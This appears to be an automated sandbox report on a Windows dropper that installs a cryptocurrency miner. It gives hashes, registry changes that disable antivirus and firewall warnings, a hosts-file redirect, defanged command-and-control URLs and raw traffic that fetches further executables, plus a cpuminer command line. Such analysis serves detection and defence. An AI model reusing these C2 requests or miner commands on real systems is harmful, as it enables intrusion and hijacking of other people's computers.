Gen.Variant.Symmi.25089_e81dfcb9e9

by malwarelabrobot on May 15th, 2014 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e81dfcb9e9fdf2bced6aa97ed74c4eae
SHA1: 6ae95ee3fc912dba979dd6de247afd1fa13dfd16
SHA256: 39b7ea92074ef980b982c83cb8aa4aa8c312ce0cbe8bb5ab2a2acb68998586aa
SSDeep: 24576:RYXcXApdpCJ2/RUXymXxoFC4bPq5h/jOVcCS:GQXymSbk/aS/
Size: 810496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Windows
Created at: 2014-02-12 19:36:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

aiz8uai9f3yo.exe:2316
aiz8uai9f3yo.exe:3856
aiz8uahpqryo.exe:3144
aiz8uahl8fyobacsnr.exe:3212
aiz8uainiwyo.exe:1676
aiz8uaj04hyo.exe:2648
ihjbkwa.exe:416
ihjbkwa.exe:3740
%original file name%.exe:2676
uucarfjeig.exe:2064
uucarfjeig.exe:260
uucarfjeig.exe:1528

The Malware injects its code into the following process(es):
No processes have been created.

File activity

The process aiz8uahl8fyobacsnr.exe:3212 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\ihjbkwa.exe (5873 bytes)
%System%\ansdmhhppztc\tst (10 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process aiz8uainiwyo.exe:1676 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\tst (10 bytes)

The process ihjbkwa.exe:416 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\tst (10 bytes)

The process ihjbkwa.exe:3740 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Temp\aiz8uaj04hyo.exe (35 bytes)
%WinDir%\Temp\aiz8uainiwyo.exe (5873 bytes)
%System%\ansdmhhppztc\ihst (164 bytes)
%WinDir%\Temp\aiz8uaiiyfyo.exe (1940 bytes)
%System%\uucarfjeig.exe (5873 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\win64drkclient.exe (68472 bytes)
%WinDir%\Temp\aiz8uahpqryo.exe (35 bytes)
%System%\ansdmhhppztc\run (10 bytes)
%System%\ansdmhhppztc\rng (108 bytes)
%WinDir%\Temp\aiz8uai9f3yo.exe (35 bytes)
%System%\ansdmhhppztc\cfg (782 bytes)
%System%\drivers\etc\hosts (48 bytes)
%System%\ansdmhhppztc\por (1 bytes)
%System%\ansdmhhppztc\tst (10 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\aiz8uaj04hyo.exe (0 bytes)
%WinDir%\Temp\aiz8uaiiyfyo.exe (0 bytes)
%WinDir%\Temp\aiz8uainiwyo.exe (0 bytes)
%WinDir%\Temp\aiz8uai9f3yo.exe (0 bytes)
%WinDir%\Temp\aiz8uahpqryo.exe (0 bytes)

The process %original file name%.exe:2676 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aiz8uahl8fyobacsnr.exe (3883 bytes)
%System%\ansdmhhppztc\tst (10 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aiz8uahl8fyobacsnr.exe (0 bytes)

The process uucarfjeig.exe:2064 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\tst (10 bytes)

The process uucarfjeig.exe:260 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\tst (10 bytes)

The process uucarfjeig.exe:1528 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\ansdmhhppztc\tst (10 bytes)

Registry activity

The process aiz8uai9f3yo.exe:2316 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 AB F7 D4 54 B8 BF 21 2E 7F 7E 56 B8 CA 92 ED"

The process aiz8uai9f3yo.exe:3856 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 DE EF E2 76 EC 06 F4 B6 0C DE CB 78 52 25 DD"

The process aiz8uahpqryo.exe:3144 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 46 F9 9C BD C2 7F 8A 13 D2 C8 9F B1 9B C3 7D"

The process aiz8uahl8fyobacsnr.exe:3212 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 3E C5 C9 D3 AF 42 9D A2 A8 2C 53 1F CA E2"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Profile Peer Logs Encryption" = "%System%\ihjbkwa.exe"

The process aiz8uainiwyo.exe:1676 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 EA CC A5 31 6C F8 0F 63 1C B6 85 08 72 04 D8"

The process aiz8uaj04hyo.exe:2648 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A A4 B2 FA 01 B3 44 13 93 FD 14 31 AF 2B E4 0B"

The process ihjbkwa.exe:3740 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 67 0A 9F 78 CD 87 5D 91 F7 66 BD 9A 7C 80 AE"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%System%\config\systemprofile\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

Dropped PE files

MD5 File path
14ff2121eda9993823b5b7e32a6475c9 c:\WINDOWS\system32\win32drkclient.exe
ee117a41ec7d1a8a78ec55ae1d66909a c:\WINDOWS\system32\win64drkaesent.exe
897914962939e2406d9a25261cf7b604 c:\WINDOWS\system32\win64drkclient.exe

HOSTS file anomalies

The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 48 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 mail.yahoo.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 634374 634880 4.70182 7778df7ca895c5c4d53a82d8aa5bb6a0
.rdata 638976 50730 51200 3.68309 70502e176076ba4226430c4e35f5fd8f
.data 692224 157340 123392 5.50216 930bbf2b1536c7c1f75bd057b0582227

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://groupcook.net/forum/search.php?method=validate&mode=sox&v=023&sox=3cd2a600 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=all&flag&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://partyorderly.net/dep/win64drkclient.exe 98.139.135.198
hxxp://groupcook.net/forum/search.php?method=hostname&host=mail.yahoo.com&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=dep&noxor&file=win64drkclient.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=setvar&key=connected&value=3cd32000&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://partyorderly.net/dep/win32drkclient.exe 98.139.135.198
hxxp://groupcook.net/forum/search.php?method=dep&noxor&file=win32drkclient.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://partyorderly.net/dep/win64drkaesent.exe 98.139.135.198
hxxp://groupcook.net/forum/search.php?method=dep&noxor&file=win64drkaesent.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245
hxxp://groupcook.net/forum/search.php?method=checkport&port=49251&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 216.239.138.245


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response

Traffic

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3cd2a600 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:24 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l
$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....
1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8
P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".
p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(..
.I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z
6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l.
.N.y/.9.G..,.[...c.c....4....Vp4...X...).{[email protected]#`.1....&g
t;'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l
..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....
=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.L
D.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..
wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)
....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3..
....m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....
Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s..
...S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....
}X.T..f.,[email protected]....".Y.........a)\.........ow........



GET /forum/search.php?method=dep&noxor&file=win64drkaesent.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:32 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d......S
.................. ..\*[email protected]
 .......*....... .......................................*.......*..$..
..........'...............*..G.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data......... ....... [email protected]...&....!..(
....!.............@.`@.pdata........'.......'[email protected]@.xdata..
......).......(.............@.@@.bss....`b....*.......................
`..edata........*.......)[email protected]@.idata...$....*..&....).....
[email protected].....*.......*.............@[email protected].....*...
....*.............@.`..reloc...G....*..H....*[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e
. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......
... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...- ...- .1.H..(..zt...,.........1............H.
.8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.
........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........
<<< skipped >>>


GET /forum/search.php?method=dep&noxor&file=win64drkclient.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:25 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S
.................. ..~*..V............@..............................@
 .....M/ ....... .......................................*.......*..$..
..........(...............*.8I.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data...`..... ....... [email protected]`....!..b
....!.............@.`@.pdata........(.......'[email protected]@.xdata..
<....0).......).............@.@@.bss.....U...0*....................
...`..edata........*.......)[email protected]@.idata...$....*..&....*..
[email protected].....*......4*.............@[email protected].....*
......6*.............@.`..reloc..8I....*..J...8*[email protected].....
......................................................................
......................................................................
................................................ffffff.........H..(1.f
.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH....
..uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(...
....-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]
.........1.......K...f.H.... .... .1.H..(..zt...,.........1...........
.H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H.
.8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1
.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....
<<< skipped >>>


GET /dep/win64drkaesent.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net


HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Wed, 14 May 2014 13:58:32 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="
text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yaho
o! - 999 Unable to process request at this time -- error 999.</TITL
E>.<!---------------->..<style>./* nn4 hide */ ./*/*/.b
ody {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;te
xt-align:center;}table {font-size:inherit;font:x-small;}.html>body 
{font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100
%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bott
om:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px
 solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:5
3px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;pa
dding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;wi
dth:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;marg
in:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;paddi
ng:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-
bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15e
m;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}
form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-spa
ce:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet
.gif) no-repeat left center;} .form .sep {display:none;}.more {text-al
ign:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {te
xt-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<< skipped >>>


GET /forum/search.php?method=hostname&host=mail.yahoo.com&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:25 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
..........................



GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:24 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.5.FLAG cfg.318."signarmy.net" "tablefruit.net" "gentlefriend.net"
 "wrongthrew.net" "littleappear.net" "wifeknew.net" "wifeyesterday.net
" "necessarydress.net" "whichsing.net" "thistomorrow.net" "saltsecond.
net" "southblood.net" "mightglossary.net" "uponloud.net" "frontride.ne
t" "rememberpaint.net" "spokethere.net" "lasopeidres.com" var_user_ip.
371.%kill_jhminer% = "1";.%set_intercepts% = ""mail.yahoo.com" "partyo
rderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net
";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state
% = "TM";.%cpuinfo% = "Intel(R) Xeon(R) CPU X3210 @ 2.13GHz (2133 MHz)
";.%newport% = "49251";.%port% = "24661";.%ip% = "78.101.199.111";.%re
lay_soxid% = "3cd32000";.plugin.55070.miner_forced.80.win32drkclient.e
xe -a X11 -o stratum tcp://"%local server IP%":3388 -u 3cd2a600 -p x.MZ....
..................@...............................................!..L
.!This program cannot be run in DOS mode....$.........lg...4...4...4.?
y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4........
........PE..L.....\S.....................N....................@.......
......................................................................
(.....................................................................
..@...............(............................text...H...............
............ ..`.rdata...!......."..................@[email protected].... ....
......................@...............................................
..................................................................
<<< skipped >>>


GET /dep/win64drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net


HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Wed, 14 May 2014 13:58:25 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="
text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yaho
o! - 999 Unable to process request at this time -- error 999.</TITL
E>.<!---------------->..<style>./* nn4 hide */ ./*/*/.b
ody {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;te
xt-align:center;}table {font-size:inherit;font:x-small;}.html>body 
{font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100
%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bott
om:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px
 solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:5
3px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;pa
dding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;wi
dth:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;marg
in:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;paddi
ng:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-
bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15e
m;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}
form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-spa
ce:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet
.gif) no-repeat left center;} .form .sep {display:none;}.more {text-al
ign:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {te
xt-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<< skipped >>>


POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjZDJhNjAwIC1wIHgnDQo=
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:38 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
.............



GET /dep/win32drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net


HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Wed, 14 May 2014 13:58:30 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="
text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yaho
o! - 999 Unable to process request at this time -- error 999.</TITL
E>.<!---------------->..<style>./* nn4 hide */ ./*/*/.b
ody {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;te
xt-align:center;}table {font-size:inherit;font:x-small;}.html>body 
{font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100
%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bott
om:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px
 solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:5
3px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;pa
dding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;wi
dth:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;marg
in:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;paddi
ng:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-
bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15e
m;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}
form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-spa
ce:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet
.gif) no-repeat left center;} .form .sep {display:none;}.more {text-al
ign:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {te
xt-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<< skipped >>>


GET /forum/search.php?method=setvar&key=connected&value=3cd32000&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:26 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
.............



GET /forum/search.php?method=dep&noxor&file=win32drkclient.exe&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=3cd32000&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:30 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S
.................:....... ...........P....@...........................
......W......... .....................................................
....................................................................`.
...........................text....9.......:..................`.``.dat
a........P.......>[email protected]...`...L...F.........
.....@.`@.bss..................................`..idata...............
[email protected][email protected].... ..
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................&......'.......1.f.
[email protected]..$....
.......$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$
...........f...<.@[email protected][email protected]?f......j...........
.].........1.......K....v...$..L......1......yt...,.........1.........
..f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,
.........'....U1........WV.U.S....|...0.b...)..D$...........@......@..
....@......@......@......@[email protected]..
<<< skipped >>>


GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=023&sox=3cd2a600&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net


HTTP/1.1 200 OK
Date: Wed, 14 May 2014 13:58:24 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
.............

The Malware connects to the servers at the folowing location(s):

ihjbkwa.exe_3740:

.text
`.rdata
@.data
QSSSSSSh
9-T}L
s)%u1
j.hd2L
L$pj.hd2L
L$,SSShP
SShppC
SSSh`
SSShP5A
~aSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ihjbkwa.exe
yo.exe
Smart Web Counter Removal Brightness User-mode
[email protected]
uucarfjeig.exe
".qOt
&.tL}Yj
Eg@%c
.WUUx
}d%S;
6{.qO
#).oA
=.Naw
uL.xb
`=F.QU
zcÁ
%Documents and Settings%\LocalService
|%System%\uucarfjeig.exe
|groupcook.net
WATCHDOGPROC "c:\windows\system32\ihjbkwa.exe"
%System%\ihjbkwa.exe
mscoree.dll
KERNEL32.DLL

win32drkclient.exe_3936:

.text
``.data
.rdata
`@.bss
.idata
\\\\5\\\\
|$@3\$,3\$0
\$$!|$$!
|$ 1|$41
\$0#\$(1
|$\3|$81
\$\3\$`3
""""%""""1
1|$,1\$,
\$\3\$ 1|$(
\$43\$01
\$ 3\$41
1\$,1|$,
\$ 3\$(3\$8
|$03|$43|$@
|$,3|$83|$ 3|$
libgcj-13.dll
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
cpuminer 2.3.2
DEBUG: job_id='%s' extranonce2=%s ntime=x
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
